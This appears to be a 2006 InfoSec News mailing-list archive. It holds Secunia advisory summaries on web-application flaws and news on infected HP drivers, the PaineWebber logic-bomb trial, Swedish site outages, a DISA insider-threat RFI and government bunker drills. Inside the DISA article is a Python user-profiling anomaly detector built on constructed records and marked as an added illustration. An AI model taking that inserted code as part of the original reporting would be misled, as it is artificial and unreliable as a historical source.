Where: From remote
Impact: Manipulation of data
Released: 2006-05-29
Mustafa Can Bjorn has discovered a vulnerability in Eggblog, which can be exploited by malicious people to conduct SQL injection attacks.
Full Advisory: http://secunia.com/advisories/20352/

--
[SA20351] aMule Information Disclosure Vulnerability
Critical: Moderately critical
Where: From remote
Impact: Exposure of system information, Exposure of sensitive information
Released: 2006-05-29
A vulnerability has been reported in aMule, which can be exploited by malicious people and by malicious users to disclose potentially sensitive information.
Full Advisory: http://secunia.com/advisories/20351/

--
[SA20316] Geeklog Multiple Vulnerabilities and Weaknesses
Critical: Moderately critical
Where: From remote
Impact: Cross Site Scripting, Manipulation of data, Exposure of system information
Released: 2006-05-30
trueend5 has reported some vulnerabilities and weaknesses in Geeklog, which can be exploited by malicious people to disclose system information, and conduct cross-site scripting and SQL injection attacks.
Full Advisory: http://secunia.com/advisories/20316/

--
[SA20307] Seditio "Referer" HTTP Header Script Insertion Vulnerability
Critical: Moderately critical
Where: From remote
Impact: Cross Site Scripting
Released: 2006-05-29
Yunus Emre Yilmaz has discovered a vulnerability in Seditio, which can be exploited by malicious people to conduct script insertion attacks.
Full Advisory: http://secunia.com/advisories/20307/

--
[SA20304] ByteHoard File Copy and Script Insertion Vulnerabilities
Critical: Moderately critical
Where: From remote
Impact: Cross Site Scripting, Manipulation of data
Released: 2006-05-29
Nomenumbra has discovered two vulnerabilities in ByteHoard, which can be exploited by malicious people to manipulate sensitive information and conduct script insertion attacks.
Full Advisory: http://secunia.com/advisories/20304/

--
[SA20303] MailManager PostgreSQL Encoding-Based SQL Injection
Critical: Moderately critical
Where: From remote
Impact: Manipulation of data
Released: 2006-05-26
A vulnerability has been reported in MailManager, which potentially can be exploited by malicious people to conduct SQL injection attacks.
Full Advisory: http://secunia.com/advisories/20303/

--
[SA20297] V-webmail "CONFIG[pear_dir]" File Inclusion Vulnerability
Critical: Moderately critical
Where: From remote
Impact: System access
Released: 2006-05-26
beford has discovered a vulnerability in V-webmail, which can be exploited by malicious people to compromise a vulnerable system.
Full Advisory: http://secunia.com/advisories/20297/

--
[SA20295] Pre Shopping Mall SQL Injection Vulnerabilities
Critical: Moderately critical
Where: From remote
Impact: Manipulation of data
Released: 2006-05-26
luny has reported some vulnerabilities in Pre Shopping Mall, which can be exploited by malicious people to conduct SQL injection attacks.
Full Advisory: http://secunia.com/advisories/20295/

--
[SA20290] ChatPat Script Insertion and SQL Injection Vulnerabilities
Critical: Moderately critical
Where: From remote
Impact: Cross Site Scripting, Manipulation of data
Released: 2006-05-26
luny has reported two vulnerabilities in ChatPat, which can be exploited by malicious people to conduct script insertion and SQL injection attacks.
Full Advisory: http://secunia.com/advisories/20290/

--
[SA20287] iFdate Cross-Site Scripting and Script Insertion Vulnerabilities
Critical: Moderately critical
Where: From remote
Impact: Cross Site Scripting
Released: 2006-05-26
luny has reported some vulnerabilities in iFdate, which can be exploited by malicious people to conduct cross-site scripting and script insertion attacks.
Full Advisory: http://secunia.com/advisories/20287/

--
[SA20286] Realty Pro One Cross-Site Scripting and SQL Injection
Critical: Moderately critical
Where: From remote
Impact: Cross Site Scripting, Manipulation of data
Released: 2006-05-26
luny has reported some vulnerabilities in Realty Pro One, which can be exploited by malicious people to conduct cross-site scripting and SQL injection attacks.
Full Advisory: http://secunia.com/advisories/20286/

--
[SA20363] XiTi Tracking Script "xiti.js" Cross-Site Scripting Vulnerabilities
Critical: Less critical
Where: From remote
Impact: Cross Site Scripting
Released: 2006-05-31
Yannick Daffaud has reported two vulnerabilities in the XiTi Tracking Script, which can be exploited by malicious people to conduct cross-site scripting attacks.
Full Advisory: http://secunia.com/advisories/20363/

--
[SA20341] Open Searchable Image Catalogue SQL Injection Vulnerabilities
Critical: Less critical
Where: From remote
Impact: Cross Site Scripting, Manipulation of data
Released: 2006-05-31
Nenad Jovanovic has discovered some vulnerabilities in Open Searchable Image Catalogue, which can be exploited by malicious users to conduct SQL injection attacks and by malicious people to conduct cross-site scripting attacks.
Full Advisory: http://secunia.com/advisories/20341/

--
[SA20340] DGNews "upprocess.php" File Upload Vulnerability
Critical: Less critical
Where: From remote
Impact: System access
Released: 2006-05-30
r0t has discovered a vulnerability in DGNews, which can be exploited by malicious users to compromise a vulnerable system.
Full Advisory: http://secunia.com/advisories/20340/

--
[SA20336] Photoalbum B&W "index.php" Cross-Site Scripting Vulnerabilities
Critical: Less critical
Where: From remote
Impact: Cross Site Scripting
Released: 2006-05-30
black-code and sweet-devil have discovered some vulnerabilities in Photoalbum B&W, which can be exploited by malicious people to conduct cross-site scripting attacks.
Full Advisory: http://secunia.com/advisories/20336/

--
[SA20334] TikiWiki Multiple Cross-Site Scripting Vulnerabilities
Critical: Less critical
Where: From remote
Impact: Cross Site Scripting
Released: 2006-05-29
Blwood has discovered some vulnerabilities in TikiWiki, which can be exploited by malicious people to conduct cross-site scripting attacks.
Full Advisory: http://secunia.com/advisories/20334/

--
[SA20327] Achievo "atkselector" Parameter SQL Injection Vulnerability
Critical: Less critical
Where: From remote
Impact: Manipulation of data
Released: 2006-05-30
Christian Nancy has reported a vulnerability in Achievo, which can be exploited by malicious users to conduct SQL injection attacks.
Full Advisory: http://secunia.com/advisories/20327/

--
[SA20324] Vacation Rental Script "obj" Parameter Cross-Site Scripting
Critical: Less critical
Where: From remote
Impact: Cross Site Scripting
Released: 2006-05-29
luny has discovered a vulnerability in Vacation Rental Script, which can be exploited by malicious people to conduct cross-site scripting attacks.
Full Advisory: http://secunia.com/advisories/20324/

--
[SA20322] Pretty Guestbook "pagina" Cross-Site Scripting Vulnerability
Critical: Less critical
Where: From remote
Impact: Cross Site Scripting
Released: 2006-05-29
luny has discovered a vulnerability in Pretty Guestbook, which can be exploited by malicious people to conduct cross-site scripting attacks.
Full Advisory: http://secunia.com/advisories/20322/

--
[SA20321] Smile Guestbook "pagina" Cross-Site Scripting Vulnerability
Critical: Less critical
Where: From remote
Impact: Cross Site Scripting
Released: 2006-05-29
luny has discovered a vulnerability in Smile Guestbook, which can be exploited by malicious people to conduct cross-site scripting attacks.
Full Advisory: http://secunia.com/advisories/20321/

--
[SA20320] Morris Guestbook "pagina" Cross-Site Scripting Vulnerability
Critical: Less critical
Where: From remote
Impact: Cross Site Scripting
Released: 2006-05-29
luny has discovered a vulnerability in Morris Guestbook, which can be exploited by malicious people to conduct cross-site scripting attacks.
Full Advisory: http://secunia.com/advisories/20320/

--
[SA20311] php-residence Multiple Script Insertion Vulnerabilities
Critical: Less critical
Where: From remote
Impact: Cross Site Scripting
Released: 2006-05-29
Nomenumbra has reported some vulnerabilities in php-residence, which can be exploited by malicious users to conduct script insertion attacks.
Full Advisory: http://secunia.com/advisories/20311/

--
[SA20306] PHPSimpleChoose Cross-Site Scripting Vulnerability
Critical: Less critical
Where: From remote
Impact: Cross Site Scripting
Released: 2006-05-29
luny has discovered a vulnerability in PHPSimpleChoose, which can be exploited by malicious people to conduct cross-site scripting attacks.
Full Advisory: http://secunia.com/advisories/20306/

--
[SA20305] PHP-AGTC membership system "useremail" Script Insertion
Critical: Less critical
Where: From remote
Impact: Cross Site Scripting
Released: 2006-05-29
Nomenumbra has discovered a vulnerability in PHP-AGTC membership system, which can be exploited by malicious users to conduct script insertion attacks.
Full Advisory: http://secunia.com/advisories/20305/

--
[SA20296] CMS Mundo "searchstring" Cross-Site Scripting Vulnerability
Critical: Less critical
Where: From remote
Impact: Cross Site Scripting
Released: 2006-05-26
luny has reported a vulnerability in CMS Mundo, which can be exploited by malicious people to conduct cross-site scripting attacks.
Full Advisory: http://secunia.com/advisories/20296/

--
[SA20293] phpESP ADOdb Cross-Site Scripting Vulnerabilities
Critical: Less critical
Where: From remote
Impact: Cross Site Scripting
Released: 2006-05-29
Some vulnerabilities have been reported in phpESP, which can be exploited by malicious people to conduct cross-site scripting attacks.
Full Advisory: http://secunia.com/advisories/20293/

--
[SA20291] AZ Photo Album Script Pro Cross-Site Scripting Vulnerability
Critical: Less critical
Where: From remote
Impact: Cross Site Scripting
Released: 2006-05-26
luny has reported a vulnerability in AZ Photo Album Script Pro, which can be exploited by malicious people to conduct cross-site scripting attacks.
Full Advisory: http://secunia.com/advisories/20291/

--
[SA20289] Elite-Board "search" Parameter Cross-Site Scripting Vulnerability
Critical: Less critical
Where: From remote
Impact: Cross Site Scripting
Released: 2006-05-26
luny has reported a vulnerability in Elite-Board, which can be exploited by malicious people to conduct cross-site scripting attacks.
Full Advisory: http://secunia.com/advisories/20289/

--
[SA20285] Assetman Unspecified Script Insertion Vulnerabilities
Critical: Less critical
Where: From remote
Impact: Cross Site Scripting
Released: 2006-05-29
Nomenumbra has reported some vulnerabilities in Assetman, which can be exploited by malicious users to conduct script insertion attacks.
Full Advisory: http://secunia.com/advisories/20285/

--
[SA20282] iFlance Multiple Cross-Site Scripting Vulnerabilities
Critical: Less critical
Where: From remote
Impact: Cross Site Scripting
Released: 2006-05-26
luny has reported some vulnerabilities in iFlance, which can be exploited by malicious people to conduct cross-site scripting attacks.
Full Advisory: http://secunia.com/advisories/20282/

========================================================================

Secunia recommends that you verify all advisories you receive, by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.

Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/

Subscribe: http://secunia.com/secunia_weekly_summary/

Contact details: Web : http://secunia.com/ E-mail : support at secunia.com Tel : +45 70 20 51 44 Fax : +45 70 20 51 45

From isn at c4i.org Mon Jun 5 04:26:44 2006 From: isn at c4i.org (InfoSec News) Date: Mon, 5 Jun 2006 03:26:44 -0500 (CDT) Subject: [ISN] HP printer drivers hit with Funlove virus Message-ID: http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9000907 By Robert McMillan IDG News Service June 02, 2006

Hewlett-Packard Co. on Thursday pulled a printer driver from its Web site after security vendor BitDefender reported that the software was infected with the same computer virus that infected HP's drivers more than five years ago. A BitDefender partner notified the security vendor of the infected driver software on Wednesday, and the company's security researchers soon determined that it had the same Funlove virus that had plagued HP in December 2000. BitDefender notified HP of the problem on Wednesday, and the infected printer driver was removed from HP's Web site early Thursday, said BitDefender spokesman Vitor Souza. Until then, the virus was being distributed with the Korean version of the Windows 95/98 driver for HP's Officejet g85 All-in-One printer. HP no longer sells the all-in-one printer, and current antivirus products are able to block the virus. So while the oversight is an embarrassment for HP, it's unlikely that many users were affected by Funlove. Previously, HP had inadvertently distributed the Funlove virus in Japanese printer drivers that were made available on the company's Web site. Souza believes that HP most likely neglected to remove this particular infected driver back in 2000. "It's just like nobody had run a test against antivirus [software]," he said. Even for users who fall prey to the virus, the consequences are not severe.
When it gets installed, Funlove pops up a text message that reads "Fun Loving Criminal," and then attempts to reboot the PC. On Windows NT machines, it attempts to change system settings so that files that can normally be seen only by administrators are visible to all. HP executives were not immediately available to comment for this story. BitDefender is owned by Softwin SRL, based in Bucharest, Romania.

From isn at c4i.org Mon Jun 5 04:26:21 2006 From: isn at c4i.org (InfoSec News) Date: Mon, 5 Jun 2006 03:26:21 -0500 (CDT) Subject: [ISN] PaineWebber Systems Admin Faces Trial For Computer Sabotage Message-ID: http://www.informationweek.com/security/showArticle.jhtml?articleID=188700855 By Sharon Gaudin InformationWeek Jun 1, 2006

A former systems administrator for financial giant UBS PaineWebber goes on trial Tuesday for allegedly sabotaging two-thirds of the company's computer network in what prosecutors say was a vengeful attempt to profit from a crashing stock price. Roger Duronio, 63, of Bogota, N.J., is facing federal charges in front of a U.S. District Court in Newark, in connection with the creation and planting of malicious code on more than 1,000 computers in the company's central office, as well as in approximately 370 branch offices. When the malicious code, or "logic bomb," was triggered on March 4, 2002, it began deleting files and data, taking down many PaineWebber computers across the United States and hindering trading for days in some branch offices and for several weeks in others, according to Assistant U.S. Attorney Mauro Wolfe, lead prosecutor on the case. The attack, according to the indictment, cost UBS PaineWebber, which was renamed UBS Wealth Management USA in 2003, $3 million just to assess and repair the damage. The company didn't submit a list of losses to the government based on business downtime or lost trading opportunities.
Chris Adams, Duronio's defense attorney and a partner at Walder Hayden & Brogan in Roseland, N.J., says the government has the wrong man. Duronio has pleaded not guilty to all charges. He has been free on bail awaiting trial for the past four years. Adams says he's not working in an IT position at this time. According to Wolfe, Duronio is facing four counts--one count of computer intrusion, one count of mail fraud, and two counts of securities fraud. The government contends that Duronio tried to profit from the attack by manipulating the stock price of the global investment banking and securities firm with the attack on its network. The government contends that in the months leading up to the planting of the logic bomb and the subsequent attack, Duronio, using the U.S. postal system, bought more than $21,000 worth of 'put option' contracts on the stock of PaineWebber's parent company, UBS AG. A put option is a contract that gains value when the price of the underlying stock drops. According to Wolfe, Duronio was betting the attack would cripple the company's network, and its stock would fall in the aftermath, allowing him to cash in. Because of this part of his alleged plan, Duronio is being charged with mail and securities fraud. ''Computers across the country pretty much all went down at once,'' says Wolfe. ''System administrators started to receive phone calls that morning that certain computers weren't working. Within minutes, it escalated from one phone call to 10, 60, 70... over 100 phone calls. At or about 10 o'clock they realized it wasn't an isolated issue but all the computers across the network. It was just too much of a coincidence for that to happen... This [network] was designed so everything would not crash at once. The same network designed to not suffer that problem was suffering that exact problem.'' And Wolfe says the man who was responsible for keeping that exact system up and running for three years was the one who ultimately took it down.
''The defendant was motivated by the fact that he was a disgruntled employee who was not happy with his salary,'' says Wolfe. ''He wanted an annual salary of $175,000 guaranteed. And I think for the year 2001 he was paid about $13,000 less than that.''

Insider Attacks

Attacks by corporate insiders, even by IT professionals, are not an uncommon problem, according to last year's CSI/FBI Computer Crime Survey. With only slight variation from year to year, inside jobs occur as frequently as the highly publicized outside hacker attacks. Insider abuse, according to the survey, cost U.S. companies $6,856,450 last year. ''Insider attacks are definitely more dangerous,'' says Eric Maiwald, a senior analyst for Burton Group, a research and consulting firm based in Midvale, Utah. ''The average outside person generally doesn't have access to your systems. Their first job in attacking you is to get access, whereas the insider starts out with access. They're starting one step ahead of the game. You have some general expectation that they're not trying to cause you harm.'' John O'Leary, director of education at the San Francisco-based Computer Security Institute, says companies have more to fear from insiders in general because they know where the weak points in the network are, and where the critical information is stored. But he adds that executives have far more to fear from IT workers, because they not only know how to get to the information but have the tools and the access rights to do it easily. ''It's easy [to do] because we give our techs a lot of trust, but it's difficult because we generally put compensating controls in place,'' says O'Leary. ''Other [people] need to edit what these guys are doing. Someone needs to see what changes he made.
If he could make changes without somebody noticing, then something is wrong.'' Maiwald, though, says it's exceedingly difficult for companies to put in enough processes and controls to completely shut down someone with system administrator-level authority and access. ''It's only the trusted individuals who can betray you at that level," says Maiwald. ''If someone is digging ditches for you, they don't have a lot of power. But your system administrator has a lot of power because it's part of the job. If you put too many controls on them, they can't do their jobs... There are controls that can be put in place to do such things but they require a company to be very watchful, along with additional staff, [and] specific procedures. And it's just not very easy to do that.''

The Duronio Case

In this case, the government alleges that Duronio was a trusted employee -- one with great access and authority -- who used that against PaineWebber. The charge of computer intrusion is based on the government's allegations that Duronio built the code for the logic bomb, installed it on Unix machines in PaineWebber's central office in Weehawken, N.J., and then pushed it out to about 1,000 computers across the company's national network. Wolfe says the malicious code was planted ''from coast to coast." The logic bomb, which was made up of only 50 to 70 lines of code, was built to delete every file on the system, according to the prosecution. Duronio, who quit his job at PaineWebber a few weeks before the bomb went off, also allegedly planted the code on the system's backup servers so that when IT workers tried to restore operations using backup tapes, those files were deleted as well. The bomb was designed to go off every Monday at 9:30 a.m. -- just as the stock market opened -- in March, April and May of 2002. Trading, the lifeblood of the company, was interrupted because of the crippled network.
PaineWebber reported to the government that trading was hindered for a few days in larger locations, and for as long as a few weeks in some branch offices. According to the prosecution, 350 IBM support personnel were brought in to aid with the nationwide recovery effort.

''Could they trade? Yes. Could they trade the way they normally traded? No,'' says Wolfe. ''Normally... the broker would sit at his desk and go online and trade for you... If the client didn't know what the balance of their account was, they couldn't trade for them.''

The government also contends that Duronio planted the code piecemeal during the previous November and December from a remote location. Wolfe says records show that Duronio's password and user account information were used to gain remote access to the areas where the malicious code was built inside the PaineWebber network.

The U.S. Secret Service, which is frequently called in to conduct criminal investigations and specifically cyber crime, executed a warrant on March 21, 2002, and allegedly found a hard copy of the logic bomb's source code on the defendant's bedroom dresser. They also allegedly found the source code on two of his four home computers.

''The defendant used the information of the impending logic bomb attack,'' says Wolfe. ''He purchased securities. He bet against the company that the company stock would drop... He engaged in an artifice or scheme to fraud investors.''

Computer sabotage is a federal offense if it affects a computer used in interstate commerce and causes more than $5,000 worth of damage to the company over a 12-month span. Duronio faces a maximum sentence of 30 years, fines of up to $1 million and restitution for the $3.2 million PaineWebber spent on recovery.
From isn at c4i.org Mon Jun 5 04:26:32 2006
From: isn at c4i.org (InfoSec News)
Date: Mon, 5 Jun 2006 03:26:32 -0500 (CDT)
Subject: [ISN] Swedish police probe site crash
Message-ID:

http://news.com.com/Swedish+police+probe+site+crash/2100-7349_3-6079740.html

By Reuters
June 4, 2006

Sweden's domestic intelligence agency said it would probe why the government's Web site crashed on Sunday amid reports hackers had sought revenge for a crackdown on alleged online piracy.

The government Web site went offline in the early hours of Sunday. The Internet home page of the national police crashed in similar fashion on Thursday. The police Web site problem came a day after the Pirate Bay Internet page, which the recording industry calls a major source for downloading pirated music and films, was shut by police.

"They (the government) contacted us and wanted to make a police complaint that something has happened with their home page and it is now a question for us to investigate if it is a crime or something else," said Anders Thornberg, a spokesman for the Security Police intelligence agency.

Local media said hackers attacked both sites, now functioning again, after the clampdown on Pirate Bay. Pirate Bay is also up and running again.

Sweden's Emergency Management Agency earlier warned all 31 bodies involved in emergency management, such as the police and rescue services, and all 21 local authorities to ensure they were safe from attacks on their Web sites.

Newspaper Aftonbladet quoted a group called World Wide Hackers as saying they had arranged an attack on the government's Web site.

Sweden last year banned the downloading of copyright protected music and movies from the Internet after being singled out for criticism by Hollywood. The raid on Pirate Bay was the latest of several actions against suspected online piracy. Critics say the police are heavy-handed and that people should have access to free information via the Internet, including file sharing.
Several hundred people demonstrated in Stockholm on Saturday in support of Pirate Bay.

Story Copyright © 2006 Reuters Limited. All rights reserved.

From isn at c4i.org Mon Jun 5 04:26:55 2006
From: isn at c4i.org (InfoSec News)
Date: Mon, 5 Jun 2006 03:26:55 -0500 (CDT)
Subject: [ISN] DISA seeks input on insider threat tools
Message-ID:

http://www.fcw.com/article94741-06-02-06-Web

By Bob Brewin
June 2, 2006

The Defense Information Systems Agency wants industry input on tools that could counter insider threats to Defense Department information systems.

DISA said traditional efforts to secure networks focus on outside threats, but insiders pose an equally damaging threat. And they can access DOD networks without detection by the security systems.

DISA, in a request for information released June 1 [1], said it is looking for an insider-threat-focused observation tool that could be deployed on selected host DOD machines to aggressively gather and analyze data on inside threats. DISA said the insider threat tools would enhance the network security of DOD information systems.

The agency would install the host machines at network end points; they could be servers, desktop PCs or laptop PCs equipped with agent-based tools that can monitor insider network activity. The tool would collect data such as user IDs, computer type and the processes -- e-mail clients, Web browsers, office management tools, database access -- that monitored computers run.

DISA said it wants tools that can then conduct user analysis on the collected data and warn of anomalies based on user profiles and behavior patterns.

DISA envisions that the host machines would connect to a central manager that can handle as many as 250 hosts at a time, with hosts located within an enclave, such as a local-area or base network.
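As an added illustration (not code from the RFI or from any DISA tool), the following Python sketches the analysis step the RFI describes: build a per-user profile from the agent fields named above (user ID, host and computer type, process, time of day) and flag later records that deviate from that profile. All records, user IDs, host names and process names are constructed for the example.

```python
"""Per-user behavioural baseline over host-agent records (constructed example)."""
from collections import defaultdict
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Set, Tuple


@dataclass
class Event:
    """One observation reported by a host agent (fields mirror the RFI's list)."""
    ts: str          # "YYYY-MM-DD HH:MM", constructed format
    user: str        # user ID
    host: str        # host name
    host_type: str   # "server", "desktop" or "laptop"
    process: str     # e-mail client, browser, office tool, database client ...


@dataclass
class Profile:
    """What a user normally does, learned from a baseline window."""
    processes: Set[str] = field(default_factory=set)
    hosts: Set[str] = field(default_factory=set)
    host_types: Set[str] = field(default_factory=set)
    hour_lo: Optional[int] = None   # earliest hour of day seen in the baseline
    hour_hi: Optional[int] = None   # latest hour of day seen in the baseline


def hour_of(e: Event) -> int:
    return int(e.ts[11:13])


def build_profiles(baseline: List[Event]) -> Dict[str, Profile]:
    """Aggregate the baseline window into one Profile per user ID."""
    profiles: Dict[str, Profile] = defaultdict(Profile)
    for e in baseline:
        p = profiles[e.user]
        p.processes.add(e.process)
        p.hosts.add(e.host)
        p.host_types.add(e.host_type)
        h = hour_of(e)
        p.hour_lo = h if p.hour_lo is None else min(p.hour_lo, h)
        p.hour_hi = h if p.hour_hi is None else max(p.hour_hi, h)
    return dict(profiles)


def score(profile: Profile, e: Event) -> List[str]:
    """Return the ways in which an event departs from the user's profile."""
    reasons = []
    if e.process not in profile.processes:
        reasons.append(f"new process {e.process}")
    if e.host not in profile.hosts:
        reasons.append(f"new host {e.host}")
    if e.host_type not in profile.host_types:
        reasons.append(f"new host type {e.host_type}")
    h = hour_of(e)
    if not (profile.hour_lo <= h <= profile.hour_hi):
        reasons.append(f"outside usual hours ({profile.hour_lo:02d}-{profile.hour_hi:02d})")
    return reasons


def detect(baseline: List[Event], window: List[Event]) -> List[Tuple[Event, List[str]]]:
    """Score every event in the observation window against the learned profiles."""
    profiles = build_profiles(baseline)
    alerts = []
    for e in window:
        if e.user not in profiles:            # never seen during the baseline
            alerts.append((e, ["no baseline for user"]))
            continue
        reasons = score(profiles[e.user], e)
        if reasons:
            alerts.append((e, reasons))
    return alerts


# Constructed records: a desk worker and a database administrator during
# the baseline window, then a later window with one normal and two odd events.
BASELINE = [
    Event("2006-05-01 08:05", "asmith", "DESK-014", "desktop", "outlook.exe"),
    Event("2006-05-01 09:10", "asmith", "DESK-014", "desktop", "iexplore.exe"),
    Event("2006-05-01 16:45", "asmith", "DESK-014", "desktop", "winword.exe"),
    Event("2006-05-01 09:00", "dbadmin", "SRV-DB1", "server", "sqlplus"),
    Event("2006-05-01 18:30", "dbadmin", "SRV-DB1", "server", "sqlplus"),
]
WINDOW = [
    Event("2006-05-02 10:00", "dbadmin", "SRV-DB1", "server", "sqlplus"),     # routine
    Event("2006-05-02 02:10", "asmith", "SRV-DB1", "server", "sqlplus"),      # desk user on a DB server at night
    Event("2006-05-02 11:00", "contractor7", "LAP-220", "laptop", "ftp.exe"),  # no profile at all
]


def run() -> List[Tuple[Event, List[str]]]:
    return detect(BASELINE, WINDOW)


if __name__ == "__main__":
    for e, reasons in run():
        print(f"{e.ts} {e.user}@{e.host} {e.process}: " + "; ".join(reasons))
```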
The insider threat tools should also include a console, which is the central display and action point for collected user data and will provide the operator with real-time insight into user activity, the RFI states.

DISA said it wants a tool capable of working with a wide range of operating systems including Microsoft Windows 2000, Windows XP, Windows NT4, Sun Microsystems Solaris, Unix and Linux.

The due date for RFI responses is July 5.

[1] http://www.fbo.gov/spg/DISA/D4AD/DITCO/RFI418/listing.html

From isn at c4i.org Mon Jun 5 04:27:12 2006
From: isn at c4i.org (InfoSec News)
Date: Mon, 5 Jun 2006 03:27:12 -0500 (CDT)
Subject: [ISN] BACK TO THE BUNKER
Message-ID:

http://www.washingtonpost.com/wp-dyn/content/article/2006/06/02/AR2006060201410.html

By William M. Arkin
The Washington Post
June 4, 2006

On Monday, June 19, about 4,000 government workers representing more than 50 federal agencies from the State Department to the Commodity Futures Trading Commission will say goodbye to their families and set off for dozens of classified emergency facilities stretching from the Maryland and Virginia suburbs to the foothills of the Alleghenies. They will take to the bunkers in an "evacuation" that my sources describe as the largest "continuity of government" exercise ever conducted, a drill intended to prepare the U.S. government for an event even more catastrophic than the Sept. 11, 2001, attacks.

The exercise is the latest manifestation of an obsession with government survival that has been a hallmark of the Bush administration since 9/11, a focus of enormous and often absurd time, money and effort that has come to echo the worst follies of the Cold War.
The vast secret operation has updated the duck-and-cover scenarios of the 1950s with state-of-the-art technology -- alerts and updates delivered by pager and PDA, wireless priority service, video teleconferencing, remote backups -- to ensure that "essential" government functions continue undisrupted should a terrorist's nuclear bomb go off in downtown Washington. But for all the BlackBerry culture, the outcome is still old-fashioned black and white: We've spent hundreds of millions of dollars on alternate facilities, data warehouses and communications, yet no one can really foretell what would happen to the leadership and functioning of the federal government in a catastrophe. After 9/11, The Washington Post reported that President Bush had set up a shadow government of about 100 senior civilian managers to live and work outside Washington on a rotating basis to ensure the continuity of national security. Since then, a program once focused on presidential succession and civilian control of U.S. nuclear weapons has been expanded to encompass the entire government. From the Department of Education to the Small Business Administration to the National Archives, every department and agency is now required to plan for continuity outside Washington. Yet according to scores of documents I've obtained and interviews with half a dozen sources, there's no greater confidence today that essential services would be maintained in a disaster. And no one really knows how an evacuation would even be physically possible. Moreover, since 9/11 and Hurricane Katrina, the definition of what constitutes an "essential" government function has been expanded so ridiculously beyond core national security functions -- do we really need patent and trademark processing in the middle of a nuclear holocaust? -- that the term has become meaningless. 
The intent of the government effort may be laudable, even necessary, but a hyper-centralized approach based on the Cold War model of evacuations and bunkering makes it practically worthless. That the continuity program is so poorly conceived, and poorly run, should come as no surprise. That's because the same Federal Emergency Management Agency that failed New Orleans after Katrina, an agency that a Senate investigating committee has pronounced "in shambles and beyond repair," is in charge of this enormous effort to plan for the U.S. government's survival. Continuity programs began in the early 1950s, when the threat of nuclear war moved the administration of President Harry S. Truman to begin planning for emergency government functions and civil defense. Evacuation bunkers were built, and an incredibly complex and secretive shadow government program was created. At its height, the grand era of continuity boasted the fully operational Mount Weather, a civilian bunker built along the crest of Virginia's Blue Ridge, to which most agency heads would evacuate; the Greenbrier hotel complex and bunker in West Virginia, where Congress would shelter; and Raven Rock, or Site R, a national security bunker bored into granite along the Pennsylvania-Maryland border near Camp David, where the Joint Chiefs of Staff would command a protracted nuclear war. Special communications networks were built, and evacuation and succession procedures were practiced continually. When the Soviet Union crumbled, the program became a Cold War curiosity: Then-Defense Secretary Dick Cheney ordered Raven Rock into caretaker status in 1991. The Greenbrier bunker was shuttered and a 30-year-old special access program was declassified three years later. Then came the terrorist attacks of the mid-1990s and the looming Y2K rollover, and suddenly continuity wasn't only for nuclear war anymore. On Oct. 
21, 1998, President Bill Clinton signed Presidential Decision Directive 67, "Enduring Constitutional Government and Continuity of Government Operations." No longer would only the very few elite leaders responsible for national security be covered. Instead, every single government department and agency was directed to see to it that they could resume critical functions within 12 hours of a warning, and keep their operations running at emergency facilities for up to 30 days. FEMA was put in charge of this broad new program. On 9/11, the program was put to the test -- and failed. Not on the national security side: Vice President Cheney and others in the national security leadership were smoothly whisked away from the capital following procedures overseen by the Pentagon and the White House Military Office. But like the mass of Washingtonians, officials from other agencies found themselves virtually on their own, unsure of where to go or what to do, or whom to contact for the answers. In the aftermath, the federal government was told to reinvigorate its continuity efforts. Bush approved lines of succession for civil agencies. Cabinet departments and agencies were assigned specific emergency responsibilities. FEMA issued new preparedness guidelines and oversaw training. A National Capital Region continuity working group established in 1999, comprising six White House groups, 15 departments and 61 agencies, met to coordinate. But all the frenetic activity did not produce a government prepared for the worst. A year after 9/11, and almost three years after the deadline set in Clinton's 1998 directive, the Government Accounting Office evaluated 38 agencies and found that not one had addressed all the issues it had been ordered to. A 2004 GAO audit of 34 government continuity-of-operations plans found total confusion on the question of essential functions. One unnamed organization listed 399 such functions. 
A department included providing "speeches and articles for the Secretary and Deputy Secretary" among its essential duties, while neglecting many of its central programs. The confusion and absurdity have continued, according to documents I've collected over the past few years. In June 2004, FEMA told federal agencies that essential services in a catastrophe would include not only such obvious ones as electric power generation and disaster relief but also patent and trademark processing, student aid and passport processing. A month earlier, FEMA had told states and local communities that library services should be counted as essential along with fire protection and law enforcement. None of this can be heartening to Americans who want to believe that in a crisis, their government can distinguish between what is truly essential and what isn't -- and provide it. Just two years ago, an exercise called Forward Challenge '04 pointed up the danger of making everyone and everything essential: Barely an hour after agencies were due to arrive at their relocation sites, the Office of Management and Budget asked the reconstituted government to identify emergency funding requirements. As one after-action report for the exercise later put it in a classic case of understatement: "It was not clear . . . whether this would be a realistic request at that stage of an emergency." This year's exercise, Forward Challenge '06, will be the third major interagency continuity exercise since 9/11. Larger than Forward Challenge '04 and the Pinnacle exercise held last year, it requires 31 departments and agencies (including FEMA) to relocate. Fifty to 60 are expected to take part. According to government sources, the exercise will test the newly created continuity of government alert conditions -- called COGCONs -- that emulate the DEFCONs of the national security community. Forward Challenge will begin with a series of alerts via BlackBerry and pager to key officials. 
It will test COGCON 1, the highest level of preparedness, in which each department and agency is required to have at least one person in its chain of command and sufficient staffing at alternate operating facilities to perform essential functions. Though key White House officials and military leadership would be relocated via the Pentagon's Joint Emergency Evacuation Program (JEEP), the civilians are on their own to make it to their designated evacuation points. But fear not: Each organization's COOP, or continuity of operations plan, details the best routes to the emergency locations. The plans even spell out what evacuees should take with them (recommended items: a combination lock, a flashlight, two towels and a small box of washing powder). Can such an exercise, announced well in advance, hope to re-create any of the tensions and fears of a real crisis? How do you simulate the experience of driving through blazing, radiated, panic-stricken streets to emergency bunker sites miles away? As the Energy Department stated in its review of Forward Challenge '04, "a method needs to be devised to realistically test the ability of . . . federal offices to relocate to their COOP sites using a scenario that simulates . . . the monumental challenges that would be involved in evacuating the city." With its new plans and procedures, Washington may think it has thought of everything to save itself. Forward Challenge will no doubt be deemed a success, and officials will pronounce the continuity-of-government project sound. There will be lessons to be learned that will justify more millions of dollars and more work in the infinite effort to guarantee order out of chaos. But the main defect -- a bunker mentality that considers too many people and too many jobs "essential" -- will remain unchallenged. -=- William M. Arkin writes the Early Warning blog for washingtonpost.com and is the author of "Code Names: Deciphering U.S. 
Military Plans, Programs and Operations in the 9/11 World" (Steerforth Press).

© 2006 The Washington Post Company

From isn at c4i.org Tue Jun 6 06:03:36 2006
From: isn at c4i.org (InfoSec News)
Date: Tue, 6 Jun 2006 05:03:36 -0500 (CDT)
